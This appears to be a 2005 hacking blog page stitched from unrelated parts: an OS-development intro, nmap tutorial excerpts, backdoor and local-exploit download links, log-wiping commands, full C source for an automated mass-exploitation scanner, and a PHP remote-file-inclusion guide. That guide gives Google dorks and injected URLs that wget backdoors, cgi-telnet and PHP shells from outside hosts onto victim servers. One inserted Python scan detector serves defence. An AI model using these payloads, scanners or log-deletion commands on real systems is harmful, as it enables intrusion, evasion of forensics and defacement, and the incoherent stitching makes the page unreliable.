Friday, February 25, 2005

Build Your Own x86 OS

So You Want to Write Your Own x86 Operating System?
By Patrick Mahoney

1. Introduction
One of the biggest difficulties a hobbyist programmer faces when starting to develop an operating system of their own is deciding where to begin. Many books explain operating-system concepts in theoretical depth, but none of them seems to carry the hobbyist programmer through to an understanding of those concepts. That is what this article sets out to do.

Several articles related to this topic have appeared in recent issues of the Linux Gazette. I intend to take an approach that uses as little of a programming-oriented style as possible, and will only show the reader the tools and tips they will need to begin developing their operating system. Once they have read this article, the interested reader should be able to start browsing for everything they need and begin designing and typing in code.

You may not realise it, but developing an operating system does not start from scratch. (!!) Writing a good bootloader would be an entire project in itself, and I do not recommend starting an operating-system project by writing a bootloader. Many reliable bootloaders are freely available (Grub, lilo, ppcboot, and others...). If you plan to write your own, I suggest postponing that work until another part of the project. In this article I will use GNU Grub, the Grand Unified Bootloader.

NMAP TUTORIAL ++ CHAPTER II

Other Scanning Techniques

In my opinion nmap is the most superior network scanner. But there are some newer technologies being developed that are worth mentioning.

Xprobe2 ICMP based fingerprinting

Xprobe is an ICMP-based passive fingerprinting tool; this is a newer technique that is being used very successfully in place of the old TCP-based fingerprinting. Xprobe uses the differences in ICMP responses to determine what operating system the host is running and, much like TCP-based fingerprinting, compares its results against a database. Another advantage of ICMP-based fingerprinting is that it is very fast: in most cases all it needs is one packet, unlike nmap's TCP fingerprinting, which has to build custom packets and is quite time-consuming; ICMP does not need to craft any specific packets. Each operating system has small differences in its TCP stack implementation, and Xprobe has a database of those differences.

[root@REDHATBOX xprobe2-0.1]# xprobe2 -v 192.168.0.3

XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com

[+] Target is 192.168.0.3
[+] Loading modules.
[+] Following modules are loaded:
[x]ICMP echo (ping)
[x]TTL distance
[x]ICMP echo
[x]ICMP Timestamp
[x]ICMP Address
[x]ICMP Info Request
[x]ICMP port unreach
[+] 7 modules registered
[+] Initializing scan engine
[+] Running scan engine
[+] Host: 192.168.0.3 is up (Guess probability: 100%)
[+] Target: 192.168.0.3 is alive
[+] Primary guess:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.2.x" (Guess probability: 95%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.6" (Guess probability: 87%)
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "SCO OpenServer Release 5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "OpenBSD 2.5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.0" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.1" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.2" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.5" (Guess probability: 79%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.4" (Guess probability: 79%)
-------------------------------------SNIP---------------------------------------------------------

Xprobe has successfully identified the operating system as Linux running kernel 2.4.5. That's correct. This test took about 30-60 seconds, so it's a lot faster than nmap's -O TCP fingerprinting. The next test was how it would do against a Windows XP Pro box.

NMAP TUTOR ++ CHAPTER I

Introduction to Nmap

Nmap is the network exploration tool; it is essentially one of the most important tools for a security engineer or pen-tester. It is used, as its name suggests, as a network exploration tool. With nmap you can probe an entire network and find out what services are listening on each specific port. Not only that, it incorporates fingerprinting that compares different fingerprints and gives you an estimate of what operating system the machine is running. Nmap has a lot of options or flags that let you manipulate how it scans: you can simply do a TCP connect() scan that makes a full connection to the host, or a SYN scan, also known as a half-open connection; test firewall rules and distinguish whether they are firewalls or packet filters; do an idle scan and spoof your IP through another machine; or throw out decoys to make your presence less traceable. Nmap runs on Linux/BSD and Windows, although we will only be discussing its usage under Linux; the Windows version is just a port from Linux and can still be used as a supplement if you want, but you do have access to the Linux version in the attack lab.

Options and flags

The nmap options or flags are a set of inbuilt variables that help you modify how nmap probes machines.

By simply typing nmap at the command prompt you will get a brief explanation of each flag.

[root@REDHATBOX root]# nmap
Nmap 3.30 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

Syn/Stealth Scanning. -sS TCP SYN stealth port scan (default if privileged (root))

hacking tools

from my friends

toolss


These are my favourite backdoors

These are my misc tools
http://brutalside.host.sk/tools/psyBNC2%255B1%255D.2.1-linux-i86-static.tar.gz
http://brutalside.host.sk/tools/psybnc2.2.2.tar.gz
http://brutalside.host.sk/tools/kik


toolsss
http://brutalside.host.sk/tools/wget-1.5.1-1.i386.rpm
http://brutalside.host.sk/tools/gcc-3.0.4.tar.gz

This is for local exploits
http://brutalside.host.sk/tools/local.tar.gz
http://brutalside.host.sk/tools/local2.tar.gz


COBALT LOCAL EXPLOIT :: aucobalt60.sh :: [ usage : sh aucobalt60.sh ]
http://brutalside.host.sk/tools/aucobalt60.sh


This is for removing logs

Write this to remove the history: export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0

Write this to remove all logs: rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r



---------


combined hacking scanner

/*********************************************************
* Mass Scanner using a combination of
* several tools and one exploit
*
* by : iko (iko94@yahoo.com)
* release : dec,15,200*
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/

Remember the article titled "Menggunakan Mass Scanner Dengan Telnet
Fingerprint Metode Shell Scripting" (by mas scut at indohack.sf.net)?
That article explained how to try one exploit against many targets listed
in a single file. That Telnet Fingerprint Mass Scanner has one weakness: we
must already have built a list of the IP addresses to be scanned.
So, how do we make it so that we only type a single command and everything
runs by itself?
Below the author explains how, along with the tools needed.
Tools:
1. mass.c (lifted from massplo.tar.gz by mas slamet, source code below)
2. mig-port-scan.c (by no1 => greyhats.za.net, source code below)
3. a simple script (try.sh)
4. a temporary log file
5. an exploit
6. lots of patience :)
First of all, choose one exploit to use (example: explo.c), then compile that
file (note: you must fully understand how that exploit works). Step two,
compile mig-port-scan.c. Step three, write a simple script that we will use to
check which target servers have the port our exploit needs open; if it really
is open, the exploit is run and penetrates the target server.
An example of this simple script:
-----------try.sh start here--------------
#!/bin/sh
#
./mig-port-scan -h $1 -p port_yg_discan -o log_temporer
sleep 1
cat log_temporer
CEK="`cat log_temporer | awk '{print $2}'`"
if [ "$CEK" = "Open" ]; then
echo "OK server $1 terbuka, kita coba..."
./exploit -t $1
fi
echo "kita coba yang lain..... :("
-----------try.sh end here-----------------
Save it and chmod +x try.sh.
Note that the $1 argument above stands for our target's IP address, while the
1-second sleep is used to wait for mig-port-scan to report back (i.e. the scan
result). Also note the backquotes (don't get them wrong!) in the CEK variable.
You also have to replace the line ./exploit -t $1 with the command that runs
your exploit (with all of its arguments, of course!).
There are two advantages to using try.sh, namely when:
1. our exploit gets stuck halfway (stagnant/hung);
2. we have already got into a target server and want to continue our
scanning;
then we just press Ctrl+C and the process keeps running, because what gets
killed is this script and not the mass program.
Now we just need to edit the main program, mass.c.
Look at the following line in the mass.c source:
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
that is where our script goes; that line runs our script by handing it to the
variable luck (see the line system(luck);). Still interested? Then go and
learn a programming language right away!!!
Finally, we have to compile mass.c so that we can run it.
#gcc mass.c -o massexploit -Wall
then run our mass scanner:
#./massexploit
follow the instructions!
Good luck!!!
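From the defender's side, the footprint this scanner leaves is distinctive: one source opening connections to consecutive addresses on a single port within seconds (mass.c increments the last octet host by host and keeps up to MAX_SOCKETS connects in flight, each abandoned after TIMEOUT seconds). The detector below is an added example, not part of the original tutorial or of mass.c; the connection-log format it parses and the sample lines are constructed for this example.

```python
import ipaddress
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed connection-log format (constructed for this example, not from the page):
#   <ISO-8601 timestamp> SYN <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SYN (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])


def is_sequential(hosts, min_ratio=0.8):
    """True when most distinct destinations are consecutive addresses: the
    footprint of a scanner that increments the last octet host by host."""
    ints = sorted(int(ipaddress.ip_address(h)) for h in set(hosts))
    if len(ints) < 2:
        return False
    steps = sum(1 for a, b in zip(ints, ints[1:]) if b - a == 1)
    return steps / (len(ints) - 1) >= min_ratio


def detect_sweeps(lines, window=timedelta(seconds=10), min_hosts=20):
    """Return one alert per (src, dport) pair that reaches >= min_hosts distinct
    destinations inside any interval of length `window`."""
    events = defaultdict(list)          # (src, dport) -> [(ts, dst), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            ts, src, dst, dport = rec
            events[(src, dport)].append((ts, dst))

    alerts = []
    for (src, dport), evs in events.items():
        evs.sort()
        in_window = Counter()           # dst -> attempts inside the sliding window
        left = 0
        for ts, dst in evs:
            in_window[dst] += 1
            while ts - evs[left][0] > window:   # slide the left edge forward
                old = evs[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_hosts:
                all_dsts = {d for _, d in evs}
                alerts.append({
                    "src": src,
                    "dport": dport,
                    "hosts": len(all_dsts),
                    "sequential": is_sequential(all_dsts),
                    "first_seen": evs[0][0].isoformat(),
                })
                break                   # one alert per pair is enough
    return alerts


def build_sample_log():
    """Constructed sample: 10.9.9.9 sweeps 192.168.1.1-40 on port 22 within two
    seconds, plus a few ordinary connections from another host and a junk line."""
    base = datetime(2005, 2, 25, 10, 0, 0)
    lines = []
    for i in range(1, 41):
        ts = base + timedelta(milliseconds=50 * i)
        lines.append(f"{ts.isoformat()} SYN 10.9.9.9:{41000 + i} -> 192.168.1.{i}:22")
    for i, dst in enumerate(["192.168.1.10", "192.168.1.20", "192.168.1.10"]):
        ts = base + timedelta(seconds=30 * i)
        lines.append(f"{ts.isoformat()} SYN 10.1.1.1:{50000 + i} -> {dst}:80")
    lines.append("this line is not in the expected format")
    return lines


if __name__ == "__main__":
    for alert in detect_sweeps(build_sample_log()):
        print(alert)
```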

Here is the source code for mass.c:
-----------------mass.c begin here-------------------------
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_SOCKETS 500
#define TIMEOUT 5

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];

if (argc < 3) {
printf("Usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}

done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}

port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");

if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}

if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}

init_sockets();

scantime = time(0);

while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}

if (ns == 0)
break;
}

}
}
}

if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}

check_sockets();
}

}

void init_sockets(void)
{
int i;

for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}

void check_sockets(void)
{
int i, ret;

for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}

else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}

if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else {
char luck[100];
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Sodok ip %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Wuasuu, cuk...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}

void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}
---------------mass.c end here--------------------------------------

Here is the source code for mig-port-scan.c
---------------mig-port-scan.c start here---------------------------
/****************
name : mig-port-scan.c

version : 1.0

creation date : 15th of October 2002

author : no1 ( greyhats.za.net )

description : veeery fast connect() port scanner
with multi-host scanning support

usage : gcc mig-port-scan.c -o mig-port-scan -Wall
./mig-port-scan

extra : nmap is just too slow for simple connect()
scans of big IP lists thats why i coded this.
if you have any comments or suggestions, mail
me at no1@greyhats.za.net or msg me at
http://greyhats.za.net/guestbook/
****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);
int get_port(char *ports, char *backup);
int Connect(int fd, char *ip, int port, int time_out, int debug);
int usage(char *arg);
long hosts_scanned = 0;
long ports_scanned = 12;
int main(int argc, char **argv)
{
int TIMEOUT = 3;
int CHILDREN = 50;
int PORT = 0;
int DEBUG = 0;
int i = 0;
int p = 0;
int log_check = 0;
int flag = 0;
int status;
int verbose = 0;
FILE *fp;
FILE *ld;
char IP[16] = "127.0.0.1";
char INPUT[256] = "./input318";
char OUTPUT[256] = "./log";
char PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char *P_PORTS;
char *P_PORTS_BACKUP;
char opt;
P_PORTS = PORTS;
P_PORTS_BACKUP = PORTS_BACKUP;
while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)
{
switch (opt)
{
case 'h':// ip
{
flag++;
bzero(IP, sizeof(IP));
strcpy(IP, optarg);
remove("./input318");
fp = fopen(INPUT, "w");
fprintf(fp, "%s\n", IP);
fclose(fp);
fp = fopen(INPUT, "r");
break;
}
case 'i':// file with ips
{
flag++;
bzero(INPUT, sizeof(INPUT));
strcpy(INPUT, optarg);
fp = fopen(INPUT, "r");
break;
}
case 'p':// ports in 21,22,23 format
{
bzero(PORTS, sizeof(PORTS));
bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));
strcpy(PORTS, optarg);
strcpy(PORTS_BACKUP, optarg);
strcat(PORTS, ",:");
strcat(PORTS_BACKUP, ",:");
puts("TEST");
ports_scanned = 0;
for(; PORTS[p] != 0; p++)
{
if(PORTS[p] == 44)
ports_scanned++;
}
break;
}
case 'o':// log file (stdout if not used)
{
log_check = 1;
strcpy(OUTPUT, optarg);
ld = fopen(OUTPUT, "w");
break;
}
case 'c':// number of children
{
CHILDREN = atoi(optarg);
break;
}
case 't':// timeout value for connect/read/write
{
TIMEOUT = atoi(optarg);
break;
}
case 'v':// verbose mode
{
verbose++;
break;
}
case 'd':// debuging output
{
DEBUG = 1;
break;
}
}
}
if((flag == 2) || (flag == 0))
{
usage(argv[0]);
exit(1);
}
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
hosts_scanned++;
}
fclose(fp);
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n\n");
printf("Hosts being scanned: %ld\n", hosts_scanned);
printf("Ports being scanned: %ld\n\n", ports_scanned);
bzero(IP, sizeof(IP));
fp = fopen(INPUT, "r");
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
IP[strlen(IP) - 1] = '\0';
for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)
{
switch (fork())
{
case 0:
{
scan(IP, PORT, TIMEOUT, DEBUG, &ld, log_check, verbose);
_exit(0);
break;
}
case -1:
{
perror("fork error");
_exit(0);
break;
}
default:
{
if(i > CHILDREN - 2)
{
wait(&status);
i--;
}
break;
}
}
}
bzero(IP, sizeof(IP));
}
remove("./input318");
fclose(fp);
return 0;
}
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)
{
FILE *logs = *log;
int sockfd;
int stat;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket() error\n", ip, port);
return (-1);
}
stat = Connect(sockfd, ip, port, time_out, debug);
if(stat == -1)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
if(stat == -2)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
else
{
if(logcheck == 1)
{
fprintf(logs, "[%s][%d] Open\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
fprintf(stdout, "[%s][%d] Open\n", ip, port);
fflush(stdout);
close(sockfd);
}
}
return (0);
}
int get_port(char *ports, char *backup)
{
int i;
int x;
int z;
char port[5];
char tmp[256];
bzero(port, sizeof(port));
bzero(tmp, sizeof(tmp));
strcpy(tmp, ports);
for(i = 0; ports[i] != ','; i++)
{
if(ports[i] == ':')
{
strcpy(ports, backup);
return 0;
}
port[i] = ports[i];
}
port[strlen(port)] = '\0';
for(z = strlen(port) + 1, x = 0; z < strlen(ports); z++)
{
ports[x++] = tmp[z];
}
ports[x] = '\0';
return atoi(port);
}
int Connect(int fd, char *ip, int port, int time_out, int debug)
{
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error getting socket flags\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket non-blocking\n", ip, port);
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0)
{
if(errno != EINPROGRESS)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() error\n", ip, port);
close(fd);
return (-1);
}
}
else
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() timed out\n", ip, port);
close(fd);
return (-2);
}
if(select_status == -1)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> select() error on connect()\n", ip, port);
close(fd);
return (-1);
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write))
{
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0)
{
errno = ETIMEDOUT;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() timed out on connect()\n", ip, port);
close(fd);
return (-1);
}
if(getsockopt_error == 0)
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
else
{
errno = getsockopt_error;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() error on connect()\n", ip, port);
close(fd);
return (-1);
}
}
}
else
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket not readable or writable\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
int usage(char *arg)
{
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n");
printf("\n%s [[-h ] | [-i ]] [-o ] [-p <#>] [-c <#>] [-t <#>] [-v] [-d]\n", arg);
printf("\n [-h]\tsingle ip address to scan\n");
printf(" [-i]\tfile with ip addresses to scan\n");
printf(" [-o]\tlog file (defult: stdout)\n");
printf(" [-p]\tports seperated by commas\n");
printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");
printf(" [-c]\tnumber of children to spawn (default: 50)\n");
printf(" [-t]\tconnect timeout value (default: 3)\n");
printf(" [-v]\tfor verbose output (default: off)\n");
printf(" [-d]\tfor debuging output (default: off)\n\n");
return 0;
}
/*******************/
// greyhats.za.net //
/*******************/

--------------mig-port-scan.c end here---------------------------

iko would like to thank:
[+] qq
[+] tiyok
[+] keputih group
[+] everyone who is shouting for freedom

iko does not thank:
[-] monopoly
[-] bureaucracy
[-] the sycophants
[-] corruptors
[-] closed source

HACKING TRICK 9

===========
Title : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
--------------------------------------------------------------------------------------------------------
Prolog : I wrote this tutorial just for my dearest brother "Lieur-Euy"; thanks for all the best friendship, spirit, motivation, kindness, jokes, and all the time that we spent together. Just wait till I finish my homework, and we will rock the world again :)

1. allinurl filename
Targets for this filename bug can be found with the keyword "allinurl:*.php?filename=*".
The keyword '*.php' can be replaced with anything, for example index.php, so the keyword we enter into Google is "allinurl:index.php?filename=*". Once you have a target, build the URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

2. allinurl content
Targets for this content bug can be found with the keyword "allinurl:*.php?content=".
The keyword '*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?content=". Once you have a target, build the URL like this:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

3. allinurl page
Targets for this page bug can be found with the keyword "allinurl:*.php?page=*".
'*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?page=". Once you have a target, build the URL like this:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

4. allinurl link
Targets for this link bug can be found with the keyword "allinurl:*.php?link=*".
The keyword '*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?link=*". Once you have a target, build the URL like this:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

5. allinurl file
Targets for this file bug can be found with the keyword "allinurl:*.php?file=*".
'*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?file=*". Once you have a target, build the URL like this:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

Once we have a vulnerable target there are several things we can do:
I. install bindtty telnet
1. build a URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
The URL above wgets bindtty telnet onto the target server and stores the result in the /tmp folder under the file name httpd.
2. then make that httpd file in the /tmp folder executable:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3. execute that httpd file:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. open telnet to the target IP on the bindtty's port

II. install cgi-telnet
1. build a URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
The URL above wgets the cgi-telnet test.pl onto the target server and saves the result in the /var/www/cgi-bin folder under the file name test.pl. Adjust this to wherever the cgi-bin folder is located on that server when saving the cgi-telnet.
2. make the cgi-telnet test.pl executable:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. access our cgi-telnet by opening the URL:
" http://www.target.com/cgi-bin/test.pl "
enter the password "n0fr13"

III. install a PHP shell
1. build a URL like this:
"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
The URL above runs wget on the target server, producing the file log.php. If a "permission denied" message appears, look for another folder where our shell.php can be wget'ed.
2. access our PHP shell according to its folder:
" http://www.target.com/target/log.php "

IV. Deface
